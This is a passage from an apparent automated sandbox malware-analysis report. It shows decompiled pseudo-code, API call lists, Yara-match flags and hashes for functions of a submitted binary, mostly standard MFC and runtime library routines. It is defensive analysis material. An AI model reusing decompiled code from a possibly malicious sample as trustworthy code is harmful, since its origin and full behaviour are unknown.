				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E00448FA3(_t44 - 0x14);
				return E00431B73(_t41);
			}








                  0x004489f0
                  0x004489f0
                  0x004489f0
                  0x004489f7
                  0x00448a01
                  0x00448a06
                  0x00448a0c
                  0x00448a15
                  0x00448a21
                  0x00448a26
                  0x00448a2a
                  0x00448a2e
                  0x00448a34
                  0x00448a3a
                  0x00448a3b
                  0x00448a42
                  0x00448a45
                  0x00448a4f
                  0x00448a5d
                  0x00448a5d
                  0x00448a62
                  0x00448a67
                  0x00448a6d
                  0x00448a73
                  0x00448a30
                  0x00448a30
                  0x00448a30
                  0x00448a2e
                  0x00448a79
                  0x00448a80
                  0x00448a8c

                  APIs
                  • __EH_prolog3.LIBCMT ref: 004489F7
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00448A01
                  • int.LIBCPMT ref: 00448A18
                    • Part of subcall function 00447732: std::_Lockit::_Lockit.LIBCPMT ref: 00447745
                  • std::locale::_Getfacet.LIBCPMT ref: 00448A21
                  • ctype.LIBCPMT ref: 00448A3B
                  • std::bad_exception::bad_exception.LIBCMT ref: 00448A4F
                  • __CxxThrowException@8.LIBCMT ref: 00448A5D
                  • std::locale::facet::_Incref.LIBCPMT ref: 00448A6D
                  • std::locale::facet::facet_Register.LIBCPMT ref: 00448A73
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                  • String ID: TuF$bad cast
                  • API String ID: 2535038987-1496521168
                  • Opcode ID: d1a9c288e7aec9ff4f5bf7d24857f49445e3ddbaba58f23c9a0fa4d8bebe908b
                  • Instruction ID: ff64b05e2f82beb86cc65c12f0f5b39e1603df0fa0b9ef5944976ff18bc40764
                  • Opcode Fuzzy Hash: d1a9c288e7aec9ff4f5bf7d24857f49445e3ddbaba58f23c9a0fa4d8bebe908b
                  • Instruction Fuzzy Hash: 5501A13190421597EF05FBA188829BE72356F44328F54021FF1107B2E1DF7C9A06DB9D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023E8206, Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 307libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 023E8CD0
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: ($}81$(&S$10Jj$7x$GE$WBt$[I7g$x|
                  • API String ID: 1029625771-105190942
                  • Opcode ID: 2558f5100f10b554e5f19f9bf731a2e9ca480479b0700c3848657a42836c3e9e
                  • Instruction ID: 6c5bc46b1d49cfdb670d5b25e525ecf93211d1231bfb9d4c019ee1094f636d90
                  • Opcode Fuzzy Hash: 2558f5100f10b554e5f19f9bf731a2e9ca480479b0700c3848657a42836c3e9e
                  • Instruction Fuzzy Hash: DB32A5B4856369CBEB61DF829A897CDBB74BB11304F6086C8D2593B214CB750B86CF85
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042408E, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E0042408E(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t131;
				intOrPtr _t195;
				intOrPtr* _t223;
				void* _t226;
				intOrPtr _t229;

				_push(0x38);
				E00431A9B(E0044C068, __ebx, __edi, __esi);
				_t223 = __ecx;
				 *((intOrPtr*)(_t226 - 0x30)) = 0;
				 *((intOrPtr*)(_t226 - 0x34)) = 0x452b4c;
				 *(_t226 - 4) = 0;
				 *((intOrPtr*)(_t226 - 0x28)) = 0;
				 *((intOrPtr*)(_t226 - 0x2c)) = 0x452b4c;
				 *((intOrPtr*)(_t226 - 0x20)) = 0;
				 *((intOrPtr*)(_t226 - 0x24)) = 0x452b4c;
				 *(_t226 - 4) = 2;
				E00423A90(_t226 - 0x2c,  *(_t226 + 8));
				E00413342(_t226 - 0x44,  *(_t226 + 8));
				InflateRect(_t226 - 0x44,  ~( *(_t226 + 0xc)),  ~( *(_t226 + 0x10)));
				IntersectRect(_t226 - 0x44, _t226 - 0x44,  *(_t226 + 8));
				E00423A90(_t226 - 0x24, _t226 - 0x44);
				E00423059(0, _t226 - 0x34, _t223, CreateRectRgn(0, 0, 0, 0));
				E00423F00(_t226 - 0x34, _t226 - 0x2c, _t226 - 0x24, 3);
				_t228 =  *((intOrPtr*)(_t226 + 0x20));
				if( *((intOrPtr*)(_t226 + 0x20)) == 0) {
					 *((intOrPtr*)(_t226 + 0x20)) = E00423F2F(0, _t223, 0x452b4c, _t228);
				}
				_t195 =  *((intOrPtr*)(_t226 + 0x20));
				_t229 = _t195;
				_t230 = _t229 == 0;
				if(_t229 == 0) {
					E00406436(0, _t195, _t223, 0x452b4c, _t230);
				}
				if( *((intOrPtr*)(_t226 + 0x24)) == 0) {
					 *((intOrPtr*)(_t226 + 0x24)) = _t195;
				}
				 *((intOrPtr*)(_t226 - 0x18)) = 0;
				 *((intOrPtr*)(_t226 - 0x1c)) = 0x452b4c;
				 *((intOrPtr*)(_t226 - 0x10)) = 0;
				 *((intOrPtr*)(_t226 - 0x14)) = 0x452b4c;
				 *(_t226 - 4) = 4;
				if( *(_t226 + 0x14) != 0) {
					E00423059(0, _t226 - 0x1c, _t223, CreateRectRgn(0, 0, 0, 0));
					E00423EE0(_t226 - 0x2c,  *(_t226 + 0x14));
					CopyRect(_t226 - 0x44,  *(_t226 + 0x14));
					InflateRect(_t226 - 0x44,  ~( *(_t226 + 0x18)),  ~( *(_t226 + 0x1c)));
					IntersectRect(_t226 - 0x44, _t226 - 0x44,  *(_t226 + 0x14));
					E00423EE0(_t226 - 0x24, _t226 - 0x44);
					E00423F00(_t226 - 0x1c, _t226 - 0x2c, _t226 - 0x24, 3);
					if( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x24)) + 4))) {
						E00423059(0, _t226 - 0x14, _t223, CreateRectRgn(0, 0, 0, 0));
						E00423F00(_t226 - 0x14, _t226 - 0x1c, _t226 - 0x34, 3);
					}
				}
				if( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x24)) + 4)) &&  *(_t226 + 0x14) != 0) {
					E00422B77(_t223, _t226 - 0x1c);
					 *((intOrPtr*)( *_t223 + 0x50))(_t226 - 0x44);
					 *(_t226 + 0x14) = E00423194(_t223,  *((intOrPtr*)(_t226 + 0x24)));
					E0041B463(_t223,  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x40)),  *((intOrPtr*)(_t226 - 0x3c)) -  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x38)) -  *((intOrPtr*)(_t226 - 0x40)), 0x5a0049);
					E00423194(_t223,  *(_t226 + 0x14));
				}
				_t131 = _t226 - 0x14;
				if( *((intOrPtr*)(_t226 - 0x10)) == 0) {
					_t131 = _t226 - 0x34;
				}
				E00422B77(_t223, _t131);
				 *((intOrPtr*)( *_t223 + 0x50))(_t226 - 0x44);
				 *(_t226 + 0x14) = E00423194(_t223,  *((intOrPtr*)(_t226 + 0x20)));
				E0041B463(_t223,  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x40)),  *((intOrPtr*)(_t226 - 0x3c)) -  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x38)) -  *((intOrPtr*)(_t226 - 0x40)), 0x5a0049);
				_t238 =  *(_t226 + 0x14);
				if( *(_t226 + 0x14) != 0) {
					E00423194(_t223,  *(_t226 + 0x14));
				}
				E00422B77(_t223, 0);
				 *(_t226 - 4) = 3;
				 *((intOrPtr*)(_t226 - 0x14)) = 0x452b4c;
				E0040ADD4(0, _t226 - 0x14, _t223, 0x452b4c, _t238);
				 *(_t226 - 4) = 2;
				 *((intOrPtr*)(_t226 - 0x1c)) = 0x452b4c;
				E0040ADD4(0, _t226 - 0x1c, _t223, 0x452b4c, _t238);
				 *(_t226 - 4) = 1;
				 *((intOrPtr*)(_t226 - 0x24)) = 0x452b4c;
				E0040ADD4(0, _t226 - 0x24, _t223, 0x452b4c, _t238);
				 *(_t226 - 4) = 0;
				 *((intOrPtr*)(_t226 - 0x2c)) = 0x452b4c;
				E0040ADD4(0, _t226 - 0x2c, _t223, 0x452b4c, _t238);
				 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t226 - 0x34)) = 0x452b4c;
				return E00431B73(E0040ADD4(0, _t226 - 0x34, _t223, 0x452b4c,  *(_t226 - 4)));
			}








                  0x0042408e
                  0x00424095
                  0x0042409a
                  0x004240a3
                  0x004240a6
                  0x004240a9
                  0x004240ac
                  0x004240af
                  0x004240b2
                  0x004240b5
                  0x004240be
                  0x004240c2
                  0x004240cd
                  0x004240e2
                  0x004240f0
                  0x004240fd
                  0x00424110
                  0x00424122
                  0x00424127
                  0x0042412a
                  0x00424131
                  0x00424131
                  0x00424134
                  0x00424139
                  0x0042413e
                  0x00424140
                  0x00424142
                  0x00424142
                  0x0042414a
                  0x0042414c
                  0x0042414c
                  0x0042414f
                  0x00424152
                  0x00424155
                  0x00424158
                  0x0042415b
                  0x00424162
                  0x00424176
                  0x00424181
                  0x0042418d
                  0x004241a3
                  0x004241b1
                  0x004241be
                  0x004241d0
                  0x004241e1
                  0x004241f1
                  0x00424203
                  0x00424203
                  0x004241e1
                  0x00424214
                  0x00424221
                  0x0042422e
                  0x0042423b
                  0x00424259
                  0x00424263
                  0x00424263
                  0x00424268
                  0x0042426e
                  0x00424270
                  0x00424270
                  0x00424276
                  0x00424283
                  0x00424290
                  0x004242ae
                  0x004242b3
                  0x004242b6
                  0x004242bd
                  0x004242bd
                  0x004242c5
                  0x004242cd
                  0x004242d1
                  0x004242d4
                  0x004242dc
                  0x004242e0
                  0x004242e3
                  0x004242eb
                  0x004242ef
                  0x004242f2
                  0x004242fa
                  0x004242fd
                  0x00424300
                  0x00424305
                  0x0042430c
                  0x00424319

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00424095
                    • Part of subcall function 00423A90: CreateRectRgnIndirect.GDI32(?), ref: 00423A9B
                    • Part of subcall function 00413342: CopyRect.USER32 ref: 0041334E
                  • InflateRect.USER32(?,?,?), ref: 004240E2
                  • IntersectRect.USER32 ref: 004240F0
                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00424106
                    • Part of subcall function 00423F00: CombineRgn.GDI32(?,?,?,?), ref: 00423F25
                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0042416C
                  • CopyRect.USER32 ref: 0042418D
                  • InflateRect.USER32(?,?,?), ref: 004241A3
                  • IntersectRect.USER32 ref: 004241B1
                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 004241E7
                    • Part of subcall function 00423F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 00423F77
                    • Part of subcall function 00423F2F: CreatePatternBrush.GDI32(00000000), ref: 00423F84
                    • Part of subcall function 00423F2F: DeleteObject.GDI32(00000000), ref: 00423F90
                    • Part of subcall function 0041B463: PatBlt.GDI32(?,?,?,?,?,?), ref: 0041B47A
                    • Part of subcall function 00423194: SelectObject.GDI32(?,00000000), ref: 004231BA
                    • Part of subcall function 00423194: SelectObject.GDI32(?,?), ref: 004231D0
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Create$Object$CopyInflateIntersectSelect$BitmapBrushCombineDeleteH_prolog3IndirectPattern
                  • String ID: L+E
                  • API String ID: 714730959-4127712704
                  • Opcode ID: 6aa0efc2d5fbc0ece01efad2b7094022daf9b6fd7deab85dd961b32c0ce17b0a
                  • Instruction ID: c7474286af9328ab8c9880faf502c19b26b7c4664d15d937edb6bbe153de222e
                  • Opcode Fuzzy Hash: 6aa0efc2d5fbc0ece01efad2b7094022daf9b6fd7deab85dd961b32c0ce17b0a
                  • Instruction Fuzzy Hash: 1191F871A0011AEFCF01DFA5D9859EEBBB9FF08309F50416AF505A2251DB38AE05CB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041A027, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 94timeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E0041A027(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				int _t35;
				int _t36;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t74;
				void* _t75;

				_push(0xc);
				E00431A9B(E0044B74A, __ebx, __edi, __esi);
				_t74 = __ecx;
				_t61 =  *((intOrPtr*)(_t75 + 8));
				_t77 =  *((intOrPtr*)(_t75 + 8));
				if( *((intOrPtr*)(_t75 + 8)) == 0) {
					E00406436(__ebx, _t61, __edi, __ecx, _t77);
				}
				_t56 = _t74 + 0x64;
				E00419355(_t61, _t56);
				 *((intOrPtr*)(_t74 + 0x58)) =  *((intOrPtr*)(_t74 + 0x68)) - GetSystemMetrics(0x25);
				 *((intOrPtr*)(_t74 + 0x60)) = GetSystemMetrics(0x25) +  *((intOrPtr*)(_t74 + 0x68));
				_t35 = GetSystemMetrics(0x24);
				_t57 =  *_t56;
				 *((intOrPtr*)(_t74 + 0x54)) =  *_t56 - _t35;
				_t36 = GetSystemMetrics(0x24);
				 *((intOrPtr*)(_t74 + 0x5c)) = _t36 + _t57;
				 *((intOrPtr*)(_t75 - 0x10)) =  *_t74;
				 *((intOrPtr*)(_t75 - 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t75 - 0x10)) + 0x5c))(0x88, E00411D22( *_t56 - _t35, _t77, 0x800, 0, 0, 0), 0, 0x80000000, _t57 + 0xfffffff0,  *((intOrPtr*)(_t74 + 0x68)) - 0x10, 0x20, 0x20, 0, 0, 0);
				E00406A7F(_t74,  *((intOrPtr*)(_t75 + 8)));
				if( *((intOrPtr*)(_t75 - 0x10)) != 0) {
					 *(_t75 - 0x14) = 0;
					 *((intOrPtr*)(_t75 - 0x18)) = 0x452b4c;
					 *(_t75 - 4) = 0;
					E00423059(0x452b4c, _t75 - 0x18, 0, CreateEllipticRgn(0, 0, 0x20, 0x20));
					SetWindowRgn( *(_t74 + 0x20),  *(_t75 - 0x14), 1);
					E0040EE3C(0x452b4c, _t75 - 0x18, SetCapture( *(_t74 + 0x20)));
					SetTimer( *(_t74 + 0x20), 0xe000, 0x32, 0);
					 *(_t75 - 4) =  *(_t75 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t75 - 0x18)) = 0x452b4c;
					E0040ADD4(0x452b4c, _t75 - 0x18, 0, _t74,  *(_t75 - 4));
				}
				return E00431B73( *((intOrPtr*)(_t75 - 0x10)));
			}









                  0x0041a027
                  0x0041a02e
                  0x0041a033
                  0x0041a035
                  0x0041a038
                  0x0041a03a
                  0x0041a03c
                  0x0041a03c
                  0x0041a041
                  0x0041a045
                  0x0041a05b
                  0x0041a065
                  0x0041a068
                  0x0041a06c
                  0x0041a072
                  0x0041a075
                  0x0041a080
                  0x0041a087
                  0x0041a0bb
                  0x0041a0be
                  0x0041a0c6
                  0x0041a0cd
                  0x0041a0d0
                  0x0041a0d9
                  0x0041a0e6
                  0x0041a0f3
                  0x0041a103
                  0x0041a113
                  0x0041a119
                  0x0041a120
                  0x0041a123
                  0x0041a123
                  0x0041a130

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041A02E
                  • GetSystemMetrics.USER32 ref: 0041A052
                  • GetSystemMetrics.USER32 ref: 0041A05E
                  • GetSystemMetrics.USER32 ref: 0041A068
                  • GetSystemMetrics.USER32 ref: 0041A075
                  • CreateEllipticRgn.GDI32(00000000,00000000,00000020,00000020), ref: 0041A0DC
                  • SetWindowRgn.USER32(?,?,00000001), ref: 0041A0F3
                  • SetCapture.USER32(?), ref: 0041A0FC
                  • SetTimer.USER32(?,0000E000,00000032,00000000), ref: 0041A113
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MetricsSystem$H_prolog3$CaptureCreateEllipticException@8ThrowTimerWindow
                  • String ID: L+E
                  • API String ID: 3309283864-4127712704
                  • Opcode ID: 1575d33e1ff024e78d8027ad71dd57e5d72c5d3502752463ac89e66c02c900ad
                  • Instruction ID: a2aa5e01c565e6b9afcf6d6bee22cb5d65a4782031c2c85be5729872fcbbbe56
                  • Opcode Fuzzy Hash: 1575d33e1ff024e78d8027ad71dd57e5d72c5d3502752463ac89e66c02c900ad
                  • Instruction Fuzzy Hash: 77311071640745AFDB20AFA6CC4AF6FBBB4FF85704F00091EB241A62E1CB74A940CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00428ECF, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 69registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E00428ECF(void* __ebx, void* _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				int _v16;
				char* _v20;
				int _v24;
				signed int _t35;
				int* _t44;

				_t44 = 0;
				_v12 = 0;
				_v20 = E004014F0(_a8, 0x104);
				_v16 = 0x104;
				_v24 = 0;
				if(RegOpenKeyA(0x80000000, ?str?,  &_v12) == 0) {
					_v8 = 0;
					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
						_a4 = 0;
						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
							_t35 = RegQueryValueExA(_a4, 0x44f0f5, 0,  &_v24, _v20,  &_v16);
							asm("sbb esi, esi");
							_t44 =  ~_t35 + 1;
							RegCloseKey(_a4);
						}
						RegCloseKey(_v8);
					}
					RegCloseKey(_v12);
				}
				E0040A356(_a8, 0xffffffff);
				return _t44;
			}










                  0x00428ee1
                  0x00428ee4
                  0x00428eec
                  0x00428ef8
                  0x00428f06
                  0x00428f0d
                  0x00428f17
                  0x00428f27
                  0x00428f35
                  0x00428f3c
                  0x00428f52
                  0x00428f5f
                  0x00428f61
                  0x00428f62
                  0x00428f62
                  0x00428f67
                  0x00428f67
                  0x00428f6c
                  0x00428f6e
                  0x00428f74
                  0x00428f7e

                  APIs
                  • RegOpenKeyA.ADVAPI32(80000000,CLSID,004542E8), ref: 00428F09
                  • RegOpenKeyA.ADVAPI32(00000000,00000000,00000000), ref: 00428F1D
                  • RegOpenKeyA.ADVAPI32(00000000,InProcServer32,?), ref: 00428F38
                  • RegQueryValueExA.ADVAPI32(?,0044F0F5,00000000,?,?,?), ref: 00428F52
                  • RegCloseKey.ADVAPI32(?), ref: 00428F62
                  • RegCloseKey.ADVAPI32(00000000), ref: 00428F67
                  • RegCloseKey.ADVAPI32(?), ref: 00428F6C
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseOpen$QueryValue
                  • String ID: CLSID$InProcServer32$BE
                  • API String ID: 3523390698-3134485842
                  • Opcode ID: bdafd1ae98bdaf0f2cb46c77699de44374e36c91a30ffc45151d91ef1fc49913
                  • Instruction ID: f24009deadb1cf4b51eab228b599f0d3e410838491bd349ca97d2e46ea76daff
                  • Opcode Fuzzy Hash: bdafd1ae98bdaf0f2cb46c77699de44374e36c91a30ffc45151d91ef1fc49913
                  • Instruction Fuzzy Hash: 23119D72900128BFDF10AFA5CC40DEEBB79EF44750B104126F914A7260D7749F45CBA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00414A58, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E00414A58(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t5;
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t18;
				void* _t19;
				char _t21;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;
				_Unknown_base(*)()* _t25;

				_push(__ecx);
				_t5 = __ecx;
				_t16 = _a4;
				 *((intOrPtr*)(__ecx)) = _a4;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				_v8 = __ecx;
				_t21 =  *0x4664dc; // 0x0
				if(_t21 == 0) {
					_push(_t19);
					_t18 = GetModuleHandleA("KERNEL32");
					_t22 = _t18;
					if(_t18 == 0) {
						L2:
						E00406436(0, _t16, _t18, _t19, _t22);
					}
					 *0x4664cc = GetProcAddress(_t18, "CreateActCtxA");
					 *0x4664d0 = GetProcAddress(_t18, "ReleaseActCtx");
					 *0x4664d4 = GetProcAddress(_t18, "ActivateActCtx");
					_t10 = GetProcAddress(_t18, "DeactivateActCtx");
					_pop(_t18);
					 *0x4664d8 = _t10;
					_pop(_t19);
					_t23 =  *0x4664cc; // 0x0
					if(_t23 == 0) {
						__eflags =  *0x4664d0; // 0x0
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x4664d4; // 0x0
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t10;
								if(__eflags != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t24 =  *0x4664d0; // 0x0
						if(_t24 == 0) {
							goto L2;
						} else {
							_t25 =  *0x4664d4; // 0x0
							if(_t25 == 0) {
								goto L2;
							} else {
								_t22 = _t10;
								if(_t10 == 0) {
									goto L2;
								}
							}
						}
					}
					_t5 = _v8;
					 *0x4664dc = 1;
				}
				return _t5;
			}
















                  0x00414a5d
                  0x00414a5e
                  0x00414a60
                  0x00414a66
                  0x00414a68
                  0x00414a6b
                  0x00414a6e
                  0x00414a74
                  0x00414a7a
                  0x00414a87
                  0x00414a89
                  0x00414a8b
                  0x00414a8d
                  0x00414a8d
                  0x00414a8d
                  0x00414aa6
                  0x00414ab3
                  0x00414ac0
                  0x00414ac5
                  0x00414ac7
                  0x00414ac8
                  0x00414acd
                  0x00414ace
                  0x00414ad4
                  0x00414aec
                  0x00414af2
                  0x00000000
                  0x00414af4
                  0x00414af4
                  0x00414afa
                  0x00000000
                  0x00414afc
                  0x00414afc
                  0x00414afe
                  0x00000000
                  0x00000000
                  0x00414afe
                  0x00414afa
                  0x00414ad6
                  0x00414ad6
                  0x00414adc
                  0x00000000
                  0x00414ade
                  0x00414ade
                  0x00414ae4
                  0x00000000
                  0x00414ae6
                  0x00414ae6
                  0x00414ae8
                  0x00000000
                  0x00414aea
                  0x00414ae8
                  0x00414ae4
                  0x00414adc
                  0x00414b00
                  0x00414b03
                  0x00414b03
                  0x00414b0c

                  APIs
                  • GetModuleHandleA.KERNEL32(KERNEL32), ref: 00414A81
                  • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 00414A9E
                  • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 00414AAB
                  • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 00414AB8
                  • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 00414AC5
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                  • API String ID: 667068680-3617302793
                  • Opcode ID: 41b6fbd96fd88b6159bd24798665531820fea7318a93b66cdc67d38a1ab704a9
                  • Instruction ID: 4fcf1ef3ac8ca3b18eba1858758f2dadc0745a3739b28e71c64bd8d406f4101a
                  • Opcode Fuzzy Hash: 41b6fbd96fd88b6159bd24798665531820fea7318a93b66cdc67d38a1ab704a9
                  • Instruction Fuzzy Hash: 6911A771D80211BBCB20DFA6AC849577EACFA95B56312443FE50483221EAB84885CF5E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00448C0F, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON
                  Download Yara Rule
                  C-Code - Quality: 86%
                  			E00448C0F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t18;
				void* _t23;
				void* _t39;
				intOrPtr _t43;
				void* _t44;

				_t39 = __edx;
				_t29 = __ebx;
				_push(0x14);
				E00431A9B(E0044CC9D, __ebx, __edi, __esi);
				E00448F7B(_t44 - 0x14, 0);
				_t43 =  *0x467440; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t18 = E00447826( *((intOrPtr*)(_t44 + 8)), E00447732(0x4674d8));
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E00448A8D(__ebx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E00430C66(_t44 - 0x20, "bad cast");
							E00430CF4(_t44 - 0x20, 0x45e790);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x467440 =  *((intOrPtr*)(_t44 - 0x10));
						E00447769( *((intOrPtr*)(_t44 - 0x10)));
						E0044911C(_t29, _t39, _t41, _t43, _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E00448FA3(_t44 - 0x14);
				return E00431B73(_t41);
			}








                  0x00448c0f
                  0x00448c0f
                  0x00448c0f
                  0x00448c16
                  0x00448c20
                  0x00448c25
                  0x00448c2b
                  0x00448c34
                  0x00448c40
                  0x00448c45
                  0x00448c49
                  0x00448c4d
                  0x00448c53
                  0x00448c59
                  0x00448c5a
                  0x00448c61
                  0x00448c64
                  0x00448c6e
                  0x00448c7c
                  0x00448c7c
                  0x00448c81
                  0x00448c86
                  0x00448c8c
                  0x00448c92
                  0x00448c4f
                  0x00448c4f
                  0x00448c4f
                  0x00448c4d
                  0x00448c98
                  0x00448c9f
                  0x00448cab

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00448C16
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00448C20
                  • int.LIBCPMT ref: 00448C37
                    • Part of subcall function 00447732: std::_Lockit::_Lockit.LIBCPMT ref: 00447745
                  • std::locale::_Getfacet.LIBCPMT ref: 00448C40
                  • codecvt.LIBCPMT ref: 00448C5A
                  • std::bad_exception::bad_exception.LIBCMT ref: 00448C6E
                  • __CxxThrowException@8.LIBCMT ref: 00448C7C
                  • std::locale::facet::_Incref.LIBCPMT ref: 00448C8C
                  • std::locale::facet::facet_Register.LIBCPMT ref: 00448C92
                  Strings
                  Memory Dump Source
